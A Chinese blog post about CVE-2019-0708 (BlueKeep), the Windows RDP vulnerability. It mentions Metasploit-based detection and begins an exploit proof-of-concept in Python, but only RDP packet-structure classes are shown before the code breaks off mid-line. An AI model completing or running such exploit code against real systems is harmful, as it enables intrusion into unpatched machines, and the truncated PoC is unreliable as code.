CVE2019_0708

CVE2019_0708是目前2019年最具危害性的漏洞CVE-2019-0708漏洞被称为“永恒之蓝”级别的漏洞,只要开启Windows远程桌面服务(RDP服务)即可被攻击。

有大佬在GitHub上公布CVE-2019-0708的检测工具,并提交了MSF的auxiliary模块。因此,使用MSF即可对目标计算机进行漏洞检测。

漏洞利用的poc

import socket, sys, struct
from OpenSSL import SSL
from impacket.structure import Structure

# I'm not responsible for what you use this to accomplish and should only be used for education purposes

# Could clean these up since I don't even use them
class TPKT(Structure):
	commonHdr = (
		('Version','B=3'),
		('Reserved','B=0'),
		('Length','>H=len(TPDU)+4'),
		('_TPDU','_-TPDU','self["Length"]-4'),
		('TPDU',':=""'),
	)

class TPDU(Structure):
	commonHdr = (
		('LengthIndicator','B=len(VariablePart)+1'),
		('Code','B=0'),
		('VariablePart',':=""'),
	)
	def __init__(self, data = None):
		Structure.__init__(self,data)
		self['VariablePart']=''

class CR_TPDU(Structure):
	commonHdr = (
		('DST-REF','<H=0'),
		('SRC-REF','<H=0'),
		('CLASS-OPTION','B=0'),
		('Type','B=0'),
		('Flags','B=0'),
		('Length','<H=8'),
	)

class DATA_TPDU(Structure):
	commonHdr = (
		('EOT','B=0x80'),
		('UserData',':=""'),
	)
	def __init__(self, data = None):
		Structure.__init__(self,data)
		self['UserData'] =''

class RDP_NEG_REQ(CR_TPDU):
	structure = (
		('requestedProtocols','<L'),
	)
	def __init__(self,data=None):
		CR_TPDU._
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值